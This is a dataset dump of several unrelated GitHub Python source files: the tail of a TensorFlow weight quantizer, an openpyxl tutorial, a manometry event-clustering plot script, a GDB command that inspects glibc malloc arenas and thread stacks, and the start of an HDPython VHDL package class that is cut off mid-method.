create quantizer before construct model optimizer\\n' % grad_ops)\n\n for v in self._all_weight_tensors:\n op = self._all_weight_tensor_op_map[v][0]\n index = self._all_weight_tensor_op_map[v][1]\n\n reduce_dims = []\n if op.type == \"Conv2D\":\n reduce_dims = [0, 1, 2]\n if op.type == \"DepthwiseConv2dNative\":\n reduce_dims = [0, 1, 3]\n if op.type == \"MatMul\":\n reduce_dims = None\n trans_a = op.get_attr(\"transpose_a\")\n trans_b = op.get_attr(\"transpose_b\")\n if index == 0:\n if not trans_a:\n reduce_dims = [1]\n else:\n reduce_dims = [0]\n if index == 1:\n if not trans_b:\n reduce_dims = [0]\n else:\n reduce_dims = [1]\n reduce_dims = tuple(reduce_dims)\n \n with tf.variable_scope(op.name + \"_weight_quant\", reuse=tf.AUTO_REUSE):\n with self._graph.gradient_override_map({'Round': 'Identity'}):\n scales = tf.reduce_max(tf.abs(v), axis=reduce_dims, keep_dims=True) / self._clamp_value + self._eps\n quant_w = tf.clip_by_value(tf.round(v / scales), -self._clamp_value, self._clamp_value)\n fake_quant_w = quant_w * scales\n\n op._update_input(index, fake_quant_w)\n\n id = tf.identity(v, name=op.name+_WQ_Mark_name+str(index))\n\n def _find_all_variable_tensors(self):\n for op in self._all_conv_and_matmul_layers:\n if op.type in _Weight_Quant_Support_Ops:\n if op.type in ['Conv2D', 'DepthwiseConv2dNative']:\n weight_tensor = op.inputs[1].op.inputs[0]\n self._total_weight_num += weight_tensor.shape.num_elements()\n self._all_weight_tensors.append(weight_tensor)\n self._all_weight_tensor_op_map[weight_tensor] = [op, 1]\n if self._debug_info:\n print(\"found weight tensor:\", weight_tensor)\n\n if op.type == 'MatMul':\n for i in range(len(op.inputs)):\n input_tensor = op.inputs[i]\n if is_weight_tensor(input_tensor):\n weight_tensor = input_tensor.op.inputs[0]\n self._total_weight_num += weight_tensor.shape.num_elements()\n self._all_weight_tensors.append(weight_tensor)\n self._all_weight_tensor_op_map[weight_tensor] = [op, i]\n if self._debug_info:\n print(\"found weight tensor:\", weight_tensor)\n","repo_name":"alibaba/MNN","sub_path":"tools/mnncompress/mnncompress/tensorflow/weight_quantizer.py","file_name":"weight_quantizer.py","file_ext":"py","file_size_in_byte":7519,"program_lang":"python","lang":"en","doc_type":"code","stars":8012,"dataset":"github-code","pt":"71"} +{"seq_id":"70782116390","text":"import openpyxl\n\n# # Createing and saving excel documents.\n# wb = openpyxl.Workbook() # Create a blank workbook\n# wb.sheetnames # It starts with one sheet.\n# sheet = wb.active\n# print(sheet.title)\n# sheet.title = 'Spam Bacon Eggs Sheet' # Change title.\n# print(sheet.title)\n# print(wb.sheetnames)\n# wb.save('new_file.xlsx') # Save the workbook\n\n# wb = openpyxl.load_workbook('example.xlsx')\n# sheet = wb.active\n# sheet.title = 'Spam Spam Spam'\n# wb.save('example_copy.xlsx') # Save the workbook\n# print(wb.sheetnames)\n\n# # Creating and removing sheets.\n# wb = openpyxl.Workbook()\n# wb.create_sheet() # Add a new sheet.\n\n# # Create a new sheet at index 0.\n# wb.create_sheet(index=0, title=\"First Sheet\")\n# wb.create_sheet(index=2, title=\"Middle Sheet\")\n# print(wb.sheetnames)\n# # Delete sheet from workbook.\n# del wb['Middle Sheet']\n# del wb['Sheet1']\n# print(wb.sheetnames)\n\n# Writing values to cells.\nwb = openpyxl.Workbook()\nsheet = wb['Sheet']\nsheet['A1'] = 'Hello, World!' 
# Edit the cell's value.\nprint(sheet['A1'].value)\nwb.save('hello_world.xlsx')\n","repo_name":"Alxndr3/atbswp","sub_path":"create_excel_file.py","file_name":"create_excel_file.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"38117164619","text":"\"\"\"Detect HAPS and Non-HAPS events in manometry experiments and plot them as clustered events.\"\"\"\n\nimport scipy.io as sio\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\n\n\n__author__ = \"Shameer Sathar, https://github.com/ssat335\"\n__version__ = \"0.0.1\"\n\nfrom HapsNonHapsDetector import HapsNonHapsDetector\nfrom ClusterEvents import ClusterEvents\n\n# load the dataset as rows (channels) and columns(time_steps)\nfilt_data = sio.loadmat('../HR_manometry_filtData/KH_filtData.mat')\n# load a subset if required\ndata_in = filt_data['filtData']\n\n#detect the Haps and Non-Haps as labels 2 and 1 respectively in a matrix of\n#same dimension as input dataset\ndetector = HapsNonHapsDetector(data_in)\ndata_label = detector.obtainHapsNonHapsLabel()\n\n# Plot the detected events. Note: it does contain false orphaned marks. Should be called\n# after obtainHapsNonHapsLabel() method\ndetector.showHapsNonHaps()\n\n# Here, the events are clustered and orphaned marks are removed. If the cluster\n# has less than 3 events, delete those as events\ncluster_mat = ClusterEvents(data_label).getClusteredEventsAsMatrix()\n\n# Plot the clustered events with each label marked as a random colour\n\ndef get_cmap(n, name='hsv'):\n    '''Returns a function that maps each index in 0, 1, ..., n-1 to a distinct\n    RGB color; the keyword argument name must be a standard mpl colormap name.'''\n    return plt.cm.get_cmap(name, n)\n\n# divide the colour map into 100 segments and assign colour randomly to labels\ncmap = get_cmap(100)\nmap_colour = {}\nfor val in np.nditer(np.unique(cluster_mat)):\n    map_colour[int(val)] = cmap(random.randint(0, 100))\n\n# plot the figure with the labels as different colour\nplt.figure()\nhorizontal_spacing = 100\nfor channel in range(0,data_in.shape[0]):\n    plt.plot(data_in[channel, :] + horizontal_spacing * channel, c='gray' )\n    for c in np.nditer(np.unique(cluster_mat)):\n        if int(c) == 0:\n            pass\n        else:\n            indexes = np.where(cluster_mat[channel, :] == int(c))\n            cmap_val = np.random.rand(3,)\n            plt.plot(indexes, data_in[channel, indexes] + horizontal_spacing * channel, 'o', mfc=None, markersize=5, c=map_colour[int(c)])\nplt.show()\n","repo_name":"ssat335/event_analyser","sub_path":"src/runManometryAnalysis.py","file_name":"runManometryAnalysis.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"18828659496","text":"#######################################################################\n# -- meminfo.gdb.py\n# Written by Tom Hebel, 2020\n#######################################################################\n\n# TODO:\n# - Implement an algorithm for finding mmapped chunks ()\n# - Implement verbosity flag in cmd line args.\n# - Align to Python style guide PEP8.\n\n# NOTE:\n# - Always re-initialize class members in the constructor, e.g.:\n#\n#   class SomeClass:\n#       someMember = []\n#       def __init__ (self):\n#           someMember = []\n#\n#   Reason: https://stackoverflow.com/questions/25401619/python-is-reusing-variables-from-one-instance-of-an-object-for-a-new-one\n#\n# - Use class member access \"modifiers\":\n#   member1 <- public\n#   
_member2 <- protected\n# __member3 <- private\n#\n# See: https://www.tutorialsteacher.com/python/private-and-protected-access-modifiers-in-python\n#\n# REFERENCES:\n# - malloc source: https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#1772\n# - malloc internals:\n# https://sourceware.org/glibc/wiki/MallocInternals\n# http://core-analyzer.sourceforge.net/index_files/Page335.html\n#\n# - Cool GDB Python stuff: https://mcgdb.0x972.info/doc/_modules/mcgdb/toolbox/my_gdb.html\n\nimport gdb\n\n# ------------------------------------------------\n# CONSTANTS\n# ------------------------------------------------\n\n# See: https://code.woboq.org/userspace/glibc/sysdeps/x86/bits/wordsize.h.html\nMALLOC_WORD_SIZE = 64\n\n# See: https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#853\nMALLOC_SIZE_OF_LONG = 8\nMALLOC_DEFAULT_MMAP_THRESHOLD_MAX = 4 * 1024 * 1024 * MALLOC_SIZE_OF_LONG\n\n# Used for calculating the max size of a heap. We are assuming x64 for this.\n# See:\n# - usage of top() and heap_for_ptr() macros:\n# https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#5486\n# - top() macro: https://code.woboq.org/userspace/glibc/malloc/arena.c.html#47\n# - heap_for_ptr() macro: https://code.woboq.org/userspace/glibc/malloc/arena.c.html#127\nMALLOC_HEAP_MAXSIZE = 2 * MALLOC_DEFAULT_MMAP_THRESHOLD_MAX\n\n# Size in bytes for a stack frame's red zone.\n# See: https://eli.thegreenplace.net/2011/09/06/stack-frame-layout-on-x86-64\nSTACK_FRAME_REDZONE_SIZE = 128\n\n# The minimum threshold for (rsp - rbp) before the stack frame is considered\n# to be small enough to likely \"spill\" its local variables into the 128 bytes\n# past rsp.\n# See: ibid.\nSTACK_FRAME_MINSIZE = 8 + 4\n\n# The threshold in bytes for abs(rsp - rbp) before we consider the frame pointer\n# to have been omitted during compilation. We will then use the rsp of the\n# previous stack frame as our rbp. Note: this value is arbitrary and chosen\n# based on my gut feeling rather than anything concrete.\n# See: ibid.\nSTACK_FRAME_MAXSIZE = 512\n\n# ------------------------------------------------\n# UTILS\n# ------------------------------------------------\n# NOTE: Make sure all member functions are static!\n\n# Usage notes:\n# - All pointers must be passed as ints.\n# - All pointers are returned as ints and must be parse_and_eval'd or \"cast\"\n# to hex() as needed. 
This is to keep things generic and avoid the performance\n# hit of loading malloc structs into Gdb.\nclass MallocMacros:\n \n # See: https://code.woboq.org/userspace/glibc/malloc/arena.c.html#47\n @staticmethod\n def top (ar_ptr):\n return int(gdb.parse_and_eval(\"(unsigned long)((struct malloc_state*){})->top\" \\\n .format(ar_ptr)))\n\n # See: https://code.woboq.org/userspace/glibc/malloc/arena.c.html#125\n @staticmethod\n def heap_for_ptr (ptr):\n return int(gdb.parse_and_eval(\"(unsigned long)((unsigned long){} & ~({} - 1))\" \\\n .format(ptr, MALLOC_HEAP_MAXSIZE)))\n\n# ------------------------------------------------\n\nclass MemInfoUtils:\n\n @staticmethod\n def findContainerForAddress (containerList): # Type: MemoryContainer\n pass\n\n# ------------------------------------------------\n# MALLOC INFO\n# ------------------------------------------------\n\n# type = struct malloc_par {\n# unsigned long trim_threshold;\n# size_t top_pad;\n# size_t mmap_threshold;\n# size_t arena_test;\n# size_t arena_max;\n# int n_mmaps;\n# int n_mmaps_max;\n# int max_n_mmaps;\n# int no_dyn_threshold;\n# size_t mmapped_mem;\n# size_t max_mmapped_mem;\n# size_t max_total_mem;\n# char *sbrk_base;\n# }\nclass MallocInfo:\n\n malloc_parPtr = None # Type: gdb.Type (struct malloc_par)\n sbrkBase = 0\n arenas = [] # Type: List[MallocArenaInfo]\n loAddr = 0\n hiAddr = 0\n\n __memoryContainers = None # Type: List[MemoryContainer]\n\n def __init__ (self, memoryContainers):\n self.malloc_parPtr = gdb.parse_and_eval(\"mp_\")\n self.sbrkBase = int(gdb.parse_and_eval(\"(unsigned long)mp_->sbrk_base\"))\n self.arenas = []\n self.loAddr = self.sbrkBase\n self.__memoryContainers = memoryContainers\n\n def loadArenas (self, loadHeaps=True):\n mainArenaAddr = int(gdb.parse_and_eval(\"(unsigned long)&main_arena\"))\n currArenaAddr = mainArenaAddr\n isMain = True\n while True:\n # DEBUG\n if len(self.arenas) == 2: break\n # /DEBUG\n print(\"\\t[{}] Arena (struct malloc_state*){}\".format(len(self.arenas)+1, hex(currArenaAddr)))\n currArena = MallocArenaInfo(self.__memoryContainers, currArenaAddr, isMain)\n if loadHeaps:\n currArena.loadHeaps()\n self.arenas.append(currArena)\n if currArena.hiAddr > self.hiAddr:\n self.hiAddr = currArena.hiAddr\n currArenaAddr = int(gdb.parse_and_eval((\"(unsigned long)((struct malloc_state*){})->next\") \\\n .format(currArenaAddr)))\n isMain = False\n if currArenaAddr == mainArenaAddr:\n break\n\n print(\"\\t[Done]\\n\")\n\n self.__memoryContainers.append(MemoryContainer(self.loAddr, self.hiAddr, self, \"All_Heaps\"))\n\n# ------------------------------------------------\n\n# type = struct malloc_state {\n# mutex_t mutex;\n# int flags;\n# mfastbinptr fastbinsY[10];\n# mchunkptr top;\n# mchunkptr last_remainder;\n# mchunkptr bins[254];\n# unsigned int binmap[4];\n# struct malloc_state *next;\n# struct malloc_state *next_free;\n# size_t system_mem;\n# size_t max_system_mem;\n# }\nclass MallocArenaInfo:\n \n malloc_stateAddr = 0 # Type: int (struct malloc_state*)\n isMain = 0\n topChunkAddr = 0\n currSize = 0\n maxSize = 0\n loAddr = 0 # Where the arena starts\n hiAddr = 0 # Where the arena ends\n heaps = [] # Type: List[MallocHeapInfo]\n\n __memoryContainers = None # Type: List[MemoryContainer]\n\n def __init__ (self, memoryContainers, malloc_stateAddr, isMain=False):\n self.malloc_stateAddr = int(malloc_stateAddr)\n self.isMain = isMain\n self.topChunkAddr = int(gdb.parse_and_eval(\"(unsigned long)((struct malloc_state*){})->top\" \\\n .format(hex(malloc_stateAddr))))\n\n # See:\n # - 
https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/implementation/malloc/\n # - https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#malloc_state\n self.currSize = int(gdb.parse_and_eval(\"((struct malloc_state*){})->system_mem\" \\\n .format(hex(malloc_stateAddr))))\n self.maxSize = int(gdb.parse_and_eval(\"((struct malloc_state*){})->max_system_mem\" \\\n .format(hex(malloc_stateAddr))))\n \n self.loAddr = 0\n self.hiAddr = 0\n self.heaps = []\n self.__memoryContainers = memoryContainers\n\n def loadHeaps (self):\n currHeapAddr = MallocMacros.heap_for_ptr(self.topChunkAddr)\n while True:\n print(\"\\t\\t({}) Heap (heap_info*){}\".format(len(self.heaps)+1, hex(currHeapAddr)))\n currHeap = MallocHeapInfo(self.__memoryContainers, self, currHeapAddr)\n self.heaps.append(currHeap)\n if currHeap.loAddr < self.loAddr:\n self.loAddr = currHeap.loAddr\n if currHeap.hiAddr > self.hiAddr:\n self.hiAddr = currHeap.hiAddr\n currHeapAddr = int(gdb.parse_and_eval(\"(unsigned long)((heap_info*){})->prev\".format(currHeapAddr)))\n if currHeapAddr == 0:\n break\n\n# ------------------------------------------------\n\n# See:\n# - https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#5485\n# - https://sourceware.org/glibc/wiki/MallocInternals#Arenas_and_Heaps\nclass MallocHeapInfo:\n \n arenaObj = None # Type: MallocArenaInfo\n heap_infoAddr = 0 # Type: int (heap_info*)\n size = 0\n loAddr = 0\n hiAddr = 0\n\n __memoryContainers = None # Type: List[MemoryContainer]\n\n def __init__ (self, memoryContainers, arenaObj, heap_infoAddr):\n self.arenaObj = arenaObj\n self.heap_infoAddr = int(heap_infoAddr)\n self.size = int(gdb.parse_and_eval(\"((heap_info*){})->size\".format(heap_infoAddr)))\n self.loAddr = int(gdb.parse_and_eval(\"{}+sizeof(*(heap_info*)0)\".format(heap_infoAddr)))\n self.hiAddr = self.loAddr + self.size\n self.__memoryContainers = memoryContainers\n self.__memoryContainers.append(MemoryContainer(self.loAddr, self.hiAddr, self, \"Heap\"))\n\n# ------------------------------------------------\n# CALL STACK INFO\n# ------------------------------------------------\n\nclass GdbInferiorInfo:\n \n threads = [] # Type: List[GdbThreadInfo]\n \n __inferior = None # Type: gdb.Inferior\n __memoryContainers = None # Type: List[MemoryContainer]\n\n def __init__ (self, memoryContainers):\n self.threads = []\n self.__inferior = gdb.inferiors()[0]\n self.__memoryContainers = memoryContainers\n\n def loadThreads(self, loadCallStacks=True):\n gdbThreads = self.__inferior.threads()\n\n currThreadNum = 1\n for gdbThread in reversed(gdbThreads):\n # DEBUG\n if currThreadNum == 10: break\n # /DEBUG\n thread = GdbThreadInfo(self.__memoryContainers, gdbThread)\n print(\"\\t[{}/{}] {} {}\".format(currThreadNum, \\\n len(gdbThreads), \\\n thread.funcName, \\\n \"\".join(thread.threadInfo.split(' ')[4:6]).split(']')[0]))\n if loadCallStacks:\n thread.loadCallStack()\n self.threads.append(thread)\n currThreadNum += 1\n print(\"\\t[Done]\\n\")\n\n# ------------------------------------------------\n\nclass GdbThreadInfo:\n \n rip = 0\n funcName = \"\"\n threadInfo = \"\"\n callStack = None # Type: GdbCallStackInfo\n \n __gdbThread = None # Type: gdb.Thread\n __origGdbState = None # Type: GdbState\n __memoryContainers = None # Type: List[MemoryContainer]\n\n def __init__ (self, memoryContainers, gdbThread):\n self.__origGdbState = GdbState(gdb.selected_thread(), gdb.selected_frame())\n gdbThread.switch()\n lastGdbFrame = gdb.newest_frame()\n lastGdbFrame.select()\n self.rip = int(gdb.parse_and_eval(\"(long) 
$rip\"))\n self.threadInfo = gdb.execute(\"thread\", to_string=True).strip()\n self.funcName = str(lastGdbFrame.name()).strip()\n self.callStack = None\n self.__gdbThread = gdbThread\n self.__origGdbState.restore()\n self.__memoryContainers = memoryContainers\n\n def loadCallStack (self):\n self.callStack = GdbCallStackInfo(self.__memoryContainers, self.__origGdbState, self.__gdbThread)\n self.callStack.loadCallStackFrames()\n\n# ------------------------------------------------\n\n# NOTE: There are \"gaps\" between consecutive stack frames, which is where the\n# function arguments live as well as the saved pc and the return address.\n# Thus, for consecutive frames F1 and F0 (where F0 is newer),\n# rsp(F1) - rbp(F0) > 0. We can use this fact in order to distinguish\n# between local variables and arguments.\nclass GdbCallStackInfo:\n \n loAddr = 0\n hiAddr = 0\n frames = [] # Type: List[GdbCallStackFrameInfo]\n \n __gdbThread = None # Type: gdb.Thread\n __gdbLatestFrame = None # Type: gdb.Frame\n __origGdbState = None # Type: GdbState\n __memoryContainers = None # Type: List[MemoryContainer]\n\n def __init__ (self, memoryContainers, gdbState, gdbThread):\n self.__origGdbState = gdbState\n gdbThread.switch()\n self.__gdbThread = gdb.selected_thread()\n self.__gdbLatestFrame = gdb.selected_frame()\n self.__origGdbState.restore()\n self.__memoryContainers = memoryContainers\n\n def loadCallStackFrames (self):\n self.__gdbThread.switch()\n self.__gdbLatestFrame.select()\n\n currGdbFrame = gdb.selected_frame()\n isNewestFrame = True\n\n while True:\n currFrame = GdbCallStackFrameInfo(self.__memoryContainers, self.__origGdbState, currGdbFrame)\n self.frames.append(currFrame)\n currGdbFrame = currGdbFrame.older()\n isNewestFrame = False\n if currGdbFrame is None:\n break\n else:\n currGdbFrame.select()\n \n self.loAddr = self.frames[len(self.frames)-1].loAddr\n self.hiAddr = self.frames[0].hiAddr\n self.__memoryContainers.append(MemoryContainer(self.loAddr, self.hiAddr, self, \"Call_Stack\"))\n\n self.__origGdbState.restore()\n\n# ------------------------------------------------\n\nclass GdbCallStackFrameInfo:\n\n isGood = 0 # If this is True, it means that the loAddr & hiAddr are wonky.\n loAddr = 0\n hiAddr = 0\n rsp = 0\n rbp = 0\n arguments = set() # Type: set(gdb.Symbol)\n locals = set() # Type: set(gdb.Symbol)\n\n __gdbFrame = None # Type: gdb.Frame\n __memoryContainers = None # Type: List[MemoryContainer]\n\n def __init__ (self, memoryContainers, gdbState, gdbFrame):\n gdbFrame.select()\n self.__gdbFrame = gdbFrame\n self.rsp = int(gdb.parse_and_eval(\"(unsigned long)$rsp\"))\n self.rsp = int(gdb.parse_and_eval(\"(unsigned long)$rbp\"))\n frameBoundaries = self.__findFrameBoundaries(self.rsp, self.rbp)\n self.loAddr = frameBoundaries[0]\n self.hiAddr = frameBoundaries[1]\n self.arguments = set()\n self.locals = set()\n self.__memoryContainers = memoryContainers\n self.__memoryContainers.append(MemoryContainer(self.loAddr, self.hiAddr, self, \"Stack_Frame\"))\n gdbState.restore()\n\n # Traverse symbols until you find the ones that demark the frame boundaries.\n # See: https://stackoverflow.com/questions/30013252/get-all-global-variables-local-variables-in-gdbs-python-interface\n def __findFrameBoundaries (self, loAddrFallback, hiAddrFallback):\n\n gdbBlock = None\n loAddr = pow(2, 64)\n hiAddr = 0\n try:\n gdbBlock = self.__gdbFrame.block()\n # Determine the frame boundaries based on the addresses of local variables.\n for gdbSymbol in gdbBlock:\n if gdbSymbol.is_argument:\n 
self.arguments.add(gdbSymbol)\n                elif gdbSymbol.is_variable:\n                    self.locals.add(gdbSymbol)\n                # TODO: decide if gdbSymbol.is_argument should count as well as .is_variable.\n                if gdbSymbol.is_variable:\n                    currSymbolAddr = 0\n                    currSymbolSize = 0\n                    try:\n                        currSymbolAddr = int(gdb.parse_and_eval(\"(unsigned long)&{}\".format(gdbSymbol.name)))\n                        currSymbolSize = int(gdb.parse_and_eval(\"sizeof({})\".format(gdbSymbol.name)))\n                    except:\n                        continue\n                    if currSymbolAddr < loAddr:\n                        loAddr = currSymbolAddr + currSymbolSize\n                    if currSymbolAddr > hiAddr:\n                        hiAddr = currSymbolAddr\n        except:\n            # If GDB can't find the block for this frame, we gracefully degrade\n            # to using the fallback addresses supplied (probably rsp & rbp).\n            loAddr = loAddrFallback\n            hiAddr = hiAddrFallback\n\n        # Check if the stack frame is too large & fall back if yes.\n        # This will likely be the case because rbp is garbage or used as a general\n        # purpose register.\n        if abs(hiAddr - loAddr) > STACK_FRAME_MAXSIZE:\n            loAddr = loAddrFallback\n            hiAddr = hiAddrFallback\n        \n        # If the frame is still too large, use rsp as both loAddr and hiAddr.\n        # TODO: Consider running a second pass over the frames array and use\n        # the outer boundaries of adjacent frames as the inner boundaries for\n        # the current one. I.e. frameA]<--frameB-->[frameC\n        if abs(hiAddr - loAddr) > STACK_FRAME_MAXSIZE:\n            loAddr = self.rsp\n            hiAddr = self.rsp\n\n        return [loAddr, hiAddr]\n\n# ------------------------------------------------\n\n# Since we have to switch to the current thread and newest frame, we have to\n# store the original thread and frame so we can cleanly restore GDB's state\n# to where the user left off.\nclass GdbState:\n\n    __gdbThread = None # Type: gdb.Thread\n    __gdbFrame = None # Type: gdb.Frame\n\n    def __init__ (self, gdbThread, gdbFrame):\n        self.__gdbThread = gdbThread\n        self.__gdbFrame = gdbFrame\n\n    def restore (self):\n        self.__gdbThread.switch()\n        self.__gdbFrame.select()\n\n# ------------------------------------------------\n# MISC.\n# ------------------------------------------------\n\n# Used to store the start and end of arenas, heaps, stacks, and individual stack frames.\nclass MemoryContainer:\n\n    loAddr = 0\n    hiAddr = 0\n    obj = None # Type: [MallocArenaInfo,MallocHeapInfo,GdbCallStackInfo,GdbCallStackFrameInfo]\n    objTypeName = \"\"\n\n    def __init__ (self, loAddr, hiAddr, obj, objTypeName):\n        self.loAddr = loAddr\n        self.hiAddr = hiAddr\n        self.obj = obj\n        self.objTypeName = objTypeName\n\n# ------------------------------------------------\n# GDB COMMAND\n# ------------------------------------------------\n\nclass Gdb_UWMallocInfo (gdb.Command):\n\n    __hasRun = 0\n    __memoryContainers = [] # Type: List[MemoryContainer]\n    __mallocInfo = None # Type: MallocInfo\n    __inferiorInfo = None # Type: GdbInferiorInfo\n\n    def __init__ (self):\n        super (Gdb_UWMallocInfo, self).__init__(\"meminfo\", gdb.COMMAND_USER)\n\n    def invoke (self, arg, from_tty):\n        argv = arg.split()\n        argc = len(argv)\n        return self.__UWMallocInfo(argc, argv)\n\n    def __UWMallocInfo (self, argc, argv):\n        \n        # Handle cmdline args.\n        if argc > 0:\n            if argv[0] == \"refresh\":\n                self.__hasRun = 0\n            elif argv[0] == \"address\":\n                if argc > 1:\n                    expr = \"{}\".format(\" \".join(argv[1:]))\n                    memContDict = self.__findAddress(expr)\n                    if len(memContDict[\"theList\"]) == 0:\n                        print(\"The address \\\"{}\\\" could not be found inside any heap or stack.\\n\".format(memContDict[\"addr\"]) \\\n                            + \"If this is a variable, it may be allocated statically.\\n\" \\\n                            + \"If it is a class, function, or other symbol, 
class Gdb_UWMallocInfo (gdb.Command):\n\n    __hasRun = 0\n    __memoryContainers = [] # Type: List[MemoryContainer]\n    __mallocInfo = None # Type: MallocInfo\n    __inferiorInfo = None # Type: GdbInferiorInfo\n\n    def __init__ (self):\n        super (Gdb_UWMallocInfo, self).__init__(\"meminfo\", gdb.COMMAND_USER)\n\n    def invoke (self, arg, from_tty):\n        argv = arg.split()\n        argc = len(argv)\n        return self.__UWMallocInfo(argc, argv)\n\n    def __UWMallocInfo (self, argc, argv):\n\n        # Handle cmdline args.\n        if argc > 0:\n            if argv[0] == \"refresh\":\n                self.__hasRun = 0\n            elif argv[0] == \"address\":\n                if argc > 1:\n                    expr = \"{}\".format(\" \".join(argv[1:]))\n                    memContDict = self.__findAddress(expr)\n                    if len(memContDict[\"theList\"]) == 0:\n                        print(\"The address \\\"{}\\\" could not be found inside any heap or stack.\\n\".format(memContDict[\"addr\"]) \\\n                            + \"If this is a variable, it may be allocated statically.\\n\" \\\n                            + \"If it is a class, function, or other symbol, it will not be located in a heap or stack.\")\n                        return\n                    print(\"The address \\\"{}\\\" was found in:\".format(memContDict[\"addr\"]))\n                    for memCont in memContDict[\"theList\"]:\n                        print(\"\\t\\tType={:<32s} lowAddress={:<16s} highAddress={:<16s}\" \\\n                            .format(memCont.objTypeName, hex(memCont.loAddr), hex(memCont.hiAddr)))\n                else:\n                    self.__printHelpText()\n            elif argv[0] == \"containers\":\n                if not self.__hasRun:\n                    self.__refreshData()\n                print(\"Memory Containers:\")\n                print(\"---\")\n                memContNum = 1\n                for memCont in self.__memoryContainers:\n                    print(\"[{}]\\t\\tType={:<32s} lowAddress={:<16s} highAddress={:<16s}\" \\\n                        .format(memContNum, memCont.objTypeName, hex(memCont.loAddr), hex(memCont.hiAddr)))\n                    memContNum += 1\n                print(\"[Done]\")\n            elif argv[0] == \"help\":\n                self.__printHelpText()\n            else:\n                if not self.__hasRun:\n                    self.__refreshData()\n                self.__prettyPrintSummary()\n\n    def __loadMallocInfo (self):\n        self.__mallocInfo = MallocInfo(self.__memoryContainers)\n        self.__mallocInfo.loadArenas()\n\n    def __loadThreadInfo (self):\n        self.__inferiorInfo = GdbInferiorInfo(self.__memoryContainers)\n        self.__inferiorInfo.loadThreads()\n\n    def __findAddress (self, expr):\n        if not self.__hasRun:\n            self.__refreshData()\n        addr = 0\n        try:\n            addr = int(gdb.parse_and_eval(\"(unsigned long)({})\".format(expr)))\n            return self.__findInMemoryContainers(addr)\n        except Exception:\n            return {\"addr\": 0, \"theList\": []}\n\n    def __findInMemoryContainers (self, addr):\n        memContList = []\n        for memCont in self.__memoryContainers:\n            if addr >= memCont.loAddr and addr <= memCont.hiAddr:\n                memContList.append(memCont)\n        return {\"addr\": addr, \"theList\": memContList}\n\n    def __refreshData (self):\n        self.__memoryContainers = []\n        print(\"Loading heap info...\")\n        self.__loadMallocInfo()\n        print(\"Loading stack info...\")\n        self.__loadThreadInfo()\n        self.__hasRun = 1\n\n    def __prettyPrintSummary (self):\n        heapCount = 0\n        for arena in self.__mallocInfo.arenas:\n            heapCount += len(arena.heaps)\n\n        frameCount = 0\n        for thread in self.__inferiorInfo.threads:\n            for frame in thread.callStack.frames:\n                frameCount += 1\n\n        print(\"Summary:\")\n        print(\"---\")\n        print(\"Heap Start Address (sbrk_base):\\t{}\".format(hex(self.__mallocInfo.sbrkBase)))\n        print(\"Number of Arenas:\\t\\t{}\".format(len(self.__mallocInfo.arenas)))\n        print(\"Number of Heaps:\\t\\t{}\".format(heapCount))\n        print(\"Number of Threads:\\t\\t{}\".format(len(self.__inferiorInfo.threads)))\n        print(\"Number of Stack Frames:\\t\\t{}\".format(frameCount))\n        print(\"Number of Memory Containers:\\t{}\".format(len(self.__memoryContainers)))\n\n        print(\"\")\n        print(\"Type \`meminfo help\` for a list of commands.\")\n\n    # TODO: Implement this.\n    def __printHelpText (self):\n        pass\n\n# ------------------------------------------------\n\nGdb_UWMallocInfo()\n\n# ================================================\n","repo_name":"thebel1/GDB-Scripts","sub_path":"meminfo.gdb.py","file_name":"meminfo.gdb.py","file_ext":"py","file_size_in_byte":23224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"35793553559","text":"import ast\nimport os,sys,inspect\n\n\nfrom HDPython.base import *\nfrom HDPython.HDPython_AST import *\nfrom HDPython.to_v_object import *\nfrom HDPython.primitive_type_converter import get_primitive_hdl_converter\n\n\n\ndef make_unique_list(list_in):\n    uniqueList = []\n    for ele in list_in:\n        if ele not in uniqueList:\n            uniqueList.append(ele)\n    return uniqueList\n\n\n# Parse the package's source file and attach the functions found for each\n# v_class / free-function template to its HDL converter.\ndef Fill_AST_Tree(package, SourceFile):\n    if not SourceFile:\n        return\n    package.astTree = xgenAST(SourceFile)\n\n    for x in package.PackageContent:\n        if x._issubclass_(\"v_class\"):\n            fun = 
package.astTree.extractFunctionsForClass(x, package)\n            x.__hdl_converter__.__ast_functions__ += fun\n\n        if x._issubclass_(\"v_free_function_template\"):\n            fun = package.astTree.extractFreeFunctions(x, package)\n            x.__hdl_converter__.__ast_functions__ += fun\n\n        x.__hdl_converter__.__ast_functions__ = make_unique_list(x.__hdl_converter__.__ast_functions__)\n\n\nclass v_package(HDPython_base):\n    def __init__(self, PackageName, PackageContent, sourceFile=None):\n        super().__init__()\n        self.__hdl_converter__ = get_primitive_hdl_converter(\"v_package\")()\n\n        s = isConverting2VHDL()\n        set_isConverting2VHDL(True)\n        proc = isProcess()\n        set_isProcess(True)\n        self.PackageName = PackageName\n        self.PackageContent = PackageContent\n        self.astTree = None\n        self.astv_classes = None\n        Fill_AST_Tree(self, sourceFile)\n\n        set_isConverting2VHDL(s)\n        set_isProcess(proc)\n\n    def getName(self):\n        return type(self).__name__\n\n    def to_string(self):\n        s = isConverting2VHDL()\n        set_isConverting2VHDL(True)\n\n        hdl.parse_file(self)\n\n        ret = \"-- XGEN: Autogenerated File\\n\\n\"\n        ret += hdl.def_includes(self, None, self)\n        ret += \"\\n\\n\"\n        p_header = hdl.def_packet_header(self, None, self)\n        if p_header.strip():\n            ret += \"package \" + self.PackageName + \" is \\n\\n\"\n            ret += p_header\n            ret += \"end \" + self.PackageName + \";\\n\\n\\n\"\n\n        ret += \"package body \" + self.PackageName + \" is\\n\\n\"\n        ret += hdl.def_packet_body(self, None, self)\n        ret += \"end \" + self.PackageName + \";\\n\\n\"\n\n        set_isConverting2VHDL(s)\n        return ret\n\n    def getInstantByName(self, SymbolName):\n        for t in self.PackageContent:\n            t = to_v_object(t)\n            if t._type == SymbolName:\n                return t\n\n        return None\n\n    def append(self, obj):\n        